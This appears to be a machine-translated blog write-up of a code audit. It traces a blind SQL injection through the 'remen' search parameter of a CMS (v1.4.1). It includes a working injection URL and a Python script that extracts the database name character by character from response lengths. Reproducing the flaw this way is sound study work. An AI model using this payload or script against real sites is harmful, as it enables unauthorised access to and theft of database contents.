当前位置：网站首页>Dream CMS foreground search SQL injection

Dream CMS foreground search SQL injection

2022-07-19 11:26:00 【fantastic_ life】

Dream CMS Front desk search SQL Inject

Dream CMS Front desk search SQL Inject

v1.4.1 The source code of version is placed in the current directory , To prevent the following vulnerabilities, the source code cannot be found

Vulnerability requirements

edition ：v1.4.1

Vulnerability analysis

This article is based on https://xz.aliyun.com/t/11224 The loopholes in this master's article are reproduced , So look directly at the loopholes , This search box is SQL The injection point is quite interesting , After learning SQl After injection , You can learn well through this loophole .

This vulnerability is in the search box on the home page , I really haven't paid attention to the possible loopholes in this place before .

The code file corresponding to the search interface is c/index/SearchAction.class.php The contents are as follows ：

class SearchAction extends HomeAction{
    private $searchModel = null;
    private $param;
    public function __construct(){
        parent::__construct();
        if(!$this->config['is_search']) rewrite::error($this->l['search_is_on']);
        $this->searchTime(); // Verify the search interval 
        $this->check(); // Verify received data 
        if($this->searchModel == null) $this->searchModel = new SearchModel();
    }

    public function index(){
        $this->param['ischild'] = 1;
        $arr = $this->searchModel->getSerachField($this->param);// Initialization conditions 
        $count = $this->searchModel->searchCoutn($arr);
        if($count > 0){
            $page = new page($count,$GLOBALS['public']['searchnum']);
            // Get list data 
            $arr['page'] = $page->returnLimit();
            $arr['is_home'] = 1;
            $searchData = $this->searchModel->getSearchList($arr,$this->param);
            // assignment url And other variables 
            foreach($searchData as $v){
                $param['type'] = 'content';
                $param['classid'] = $v['classid'];
                $param['classpath'] = $GLOBALS['allclass'][$v['classid']]['classpath'];
                $param['time'] = $v['time'];
                $param['id'] = $v['id'];
                $v['classname'] = $GLOBALS['allclass'][$v['classid']]['classname'];
                $v['url'] = $v['url'] ? $v['url'] : url($param);
                $v['classurl'] = classurl($v['classid']);
                $v['classimage'] = $GLOBALS['allclass'][$v['classid']]['images'];
                $v['parent_classid'] = $GLOBALS['allclass'][$v['classid']]['uid'];
                $newlist[] = $v;
            }
            $this->smarty->assign('list',$newlist);
            $this->smarty->assign('page',$page->html());
        }
        $this->smarty->assign('num',$count);
        // Get the search list template 
        if(!$this->param['tem']){
            if($this->param['classid']){
                $classtem = $GLOBALS['allclass'][$arr['classid']]['searchtem'];
                $arr['tem'] = $classtem ? $classtem : 'index';
            }else{
                $arr['tem'] = 'index';
            }
        }else{
            $arr['tem'] = $this->param['tem'];
        }
        $this->setSearchTime(); // Save search time 
        $this->smarty->assign('title',$this->param['keywords']);
        $this->smarty->assign('keywords',$this->param['keywords']);
        $this->smarty->assign('description',$this->param['keywords']);
        $this->smarty->display('search/'.$arr['tem'].'.html');
    }


    // Verify the received data and return 
    private function check(){
        // obtain get data 
        $_GET = filter_strs($_GET);
        $data = p(2,1,1);
        $this->param['keywords'] = string::delHtml($data['keywords']);
        if(!$this->param['keywords'] && $this->config['search_isnull']){
            rewrite::error($this->l['search_is_keywords']);
        }
        $this->param['classid'] = (int)$data['classid'];
        $this->param['mid'] = (int)$data['mid'];
        if(!$this->param['classid'] && !$this->param['mid']) rewrite::error($this->l['search_is_param']);
        if($this->param['classid'] && !isset($GLOBALS['allclass'][$this->param['classid']])){
            rewrite::error($this->l['search_is_classid']);
        }
        if($this->param['mid'] && !isset($GLOBALS['allmodule'][$this->param['mid']])){
            rewrite::error($this->l['search_is_mid']);
        }
        $this->param['tem'] = $data['tem'];
        $this->param['field'] = $data['field'];
        $this->param['time'] = $data['time'] ? $data['time'] : $this->config['search_time'];
        $this->param['tuijian'] = $data['tuijian'];
        $this->param['remen'] = $data['remen'];
    }

}

As you can see from the code above When initializing the construct, it will call $this->check(); Verify received data , Trace this function to see check The verification parameter in the method must have keywords, At the same time, it will call string::delHtml($data['keywords']); Yes keywords Do the processing , track delHtml To class/string.class.php The following code of the file ：

// Get rid of html label 
public static function delHtml($str){
    return strip_tags($str);
}

Mainly used to remove html label . Back to index Keep tracking the code , You can see that the code will execute $count = $this->searchModel->searchCoutn($arr); , Track to m/SearchModel.class.php In the document searchCoutn Method

// Get the total number of searches 
public function searchCoutn($searchInfo){
    $param = $this->sqlStr($searchInfo);
    $param['force'] = 'title';
    return parent::countModel($param);
}

Keep tracking To class/Model.class.php In the document countModel Method

// Number of records returned 
protected function countModel($param=array()){
    return parent::countDB($this->tab['0'],$param);
}

Finally, it can be traced to class/db.class.php Of documents countDB Method

// Number of query records 
protected function countDB($tab,$param){
    $We = $this->where($param);
    $sql="SELECT count(1) FROM ".DB_PRE."$tab $We";
    // echo $sql;
    $result=$this->query($sql);
    $data = mysql_fetch_row($result);
    $this->result($result);
    return $data['0'];
}

For convenience, you can add echo $sql; debug , It is convenient to print the currently executed SQL

The above is our overall tracing process of vulnerability code , Let's go back to the original code file c/index/SearchAction.class.php Medium check Method

// Verify the received data and return 
private function check(){
    // obtain get data 
    $_GET = filter_strs($_GET);
    $data = p(2,1,1);
    $this->param['keywords'] = string::delHtml($data['keywords']);
    if(!$this->param['keywords'] && $this->config['search_isnull']){
        rewrite::error($this->l['search_is_keywords']);
    }
    $this->param['classid'] = (int)$data['classid'];
    $this->param['mid'] = (int)$data['mid'];
    if(!$this->param['classid'] && !$this->param['mid']) rewrite::error($this->l['search_is_param']);
    if($this->param['classid'] && !isset($GLOBALS['allclass'][$this->param['classid']])){
        rewrite::error($this->l['search_is_classid']);
    }
    if($this->param['mid'] && !isset($GLOBALS['allmodule'][$this->param['mid']])){
        rewrite::error($this->l['search_is_mid']);
    }
    $this->param['tem'] = $data['tem'];
    $this->param['field'] = $data['field'];
    $this->param['time'] = $data['time'] ? $data['time'] : $this->config['search_time'];
    $this->param['tuijian'] = $data['tuijian'];
    $this->param['remen'] = $data['remen'];
}

What needs to be noted here is $data = p(2,1,1); This place will escape the single quotation marks of the parameters we enter , Some functions are filtered .

In fact, this method also tells us a useful information

$this->param['tem'] = $data['tem'];
$this->param['field'] = $data['field'];
$this->param['time'] = $data['time'] ? $data['time'] : $this->config['search_time'];
$this->param['tuijian'] = $data['tuijian'];
$this->param['remen'] = $data['remen'];

These can be passed as parameters , Next I pass remen To test

Vulnerability testing

Send the following request ：/index.php?m=Search&a=index&classid=5&tem=index&field=title&keywords=c&remen=11 Look at the printed SQL by ：

SELECT count(1) FROM lmx_product_data  WHERE time > 1626240056 AND remen=11 AND classid in(11,12,13,14,5)  AND (title like '%c%')  ORDER BY id desc

You can see what we passed remen Has been spliced to SQL in , The rest is to do the injection test .

Send a request /index.php?m=Search&a=index&classid=5&tem=index&field=title&keywords=c&remen=2%20or%20(if(ascii(substr(database(),1,1))=0x6c,1,0))--+ Because single quotation marks will be escaped , So what's used here is ascii, The name of the database we set up for testing is lmxcms, The first is l Corresponding Namely 0x6c, At this time, the page returns Content-Length: 7722 If our value is not 0x6c The length returned is Content-Length: 4955

So you can write code based on this to obtain database information

import requests

url = "http://192.168.80.154:9090?m=search&keywords=b&mid=1&remen=1 or (if(ascii(substr(database(),{},1))={},1,0))--+"
result = ""

for i in range(1, 7):
    for j in range(80, 180):
        cl = url.format(i, hex(j))
        res = requests.get(cl)
        if len(res.text) > 6000:
            result += chr(j)
            print(result)

Summary

This vulnerability is the next example of a very good code audit , The code is not complicated , Even if you don't understand PHP You can also get started quickly